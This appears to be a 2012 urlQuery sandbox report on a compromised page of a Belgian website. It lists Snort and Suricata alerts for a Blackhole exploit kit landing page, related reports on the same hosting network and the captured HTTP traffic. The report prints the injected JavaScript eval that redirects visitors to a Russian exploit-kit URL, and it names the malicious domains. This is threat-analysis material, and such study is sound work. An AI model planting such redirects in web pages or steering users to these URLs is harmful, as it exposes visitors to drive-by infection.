Overview

URLhttp://degusto.be/sites/default/files/forwarding.htm
IP178.18.135.17
ASNAS25459 NedZone Internet BV
Location Netherlands
Report completed2012-11-12 01:22:11 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-12 01:21:31 urlQuery Client 202.180.221.1861ET CURRENT_EVENTS Blackhole 2 Landing Page (5)
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-12 01:21:30 178.18.135.17 urlQuery Client1EXPLOIT-KIT Blackholev2 landing page download attempt
2012-11-12 01:21:30 178.18.135.17 urlQuery Client1EXPLOIT-KIT Blackhole landing page download attempt


Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 178.18.135.17

Date Alerts / IDS URL IP
2012-11-09 21:44:550 / 3http://www.degusto.be/sites/default/files/forwarding.htm178.18.135.17

Last 6 reports on ASN: AS25459 NedZone Internet BV

Date Alerts / IDS URL IP
2013-04-09 18:24:501 / 3http://www.feestverlichting.net/index.php/index.php/index.php/index.php/spiegelbollen-a-toebeho (...)178.18.138.17
2013-04-09 00:39:031 / 0http://www.djcreative.nl/forum/viewtopic.php?f=8694.103.157.175
2013-04-09 00:38:271 / 0http://www.djcreative.nl/forum/memberlist.php?mode=viewprofile94.103.157.175
2013-04-09 00:14:251 / 0http://www.djcreative.nl/forum/viewtopic.php?f=86&t=191994.103.157.175
2013-04-09 00:12:091 / 0http://www.djcreative.nl/forum/viewforum.php?f=86&start=0&sid=f79d6603e398a77a9419bbef3 (...)94.103.157.175
2013-04-09 00:12:011 / 0http://www.djcreative.nl/forum/memberlist.php?mode=viewprofile&u=928&sid=10314734513771 (...)94.103.157.175



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 112, repeated: 1) 

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://canadianpanakota.ru:8080/forum/links/column.php";
}

Executed Writes (0)



HTTP Transactions (5)


Request Response 
GET /sites/default/files/forwarding.htm HTTP/1.1

Host: degusto.be

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Mon, 12 Nov 2012 00:21:30 GMT
Server: Apache/2
Last-Modified: Mon, 12 Nov 2012 00:15:15 GMT
Etag: "2212da-509-4ce4132188a6a"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Nov 2012 00:21:30 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 661
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /forum/links/column.php HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://degusto.be/sites/default/files/forwarding.htm
 
HTTP/1.1 502 Bad Gateway

Content-Type: text/html; charset=CP-1251

Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:24 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:25 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244
GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:27 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244
GET /favicon.ico HTTP/1.1

Host: degusto.be

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8

Date: Mon, 12 Nov 2012 00:21:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 00:21:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Etag: "1352679693"
Set-Cookie: language=fr; expires=Mon, 19-Nov-2012 00:21:33 GMT; path=/
language=fr; expires=Mon, 19-Nov-2012 00:21:33 GMT; path=/
Content-Language: fr
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 166
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive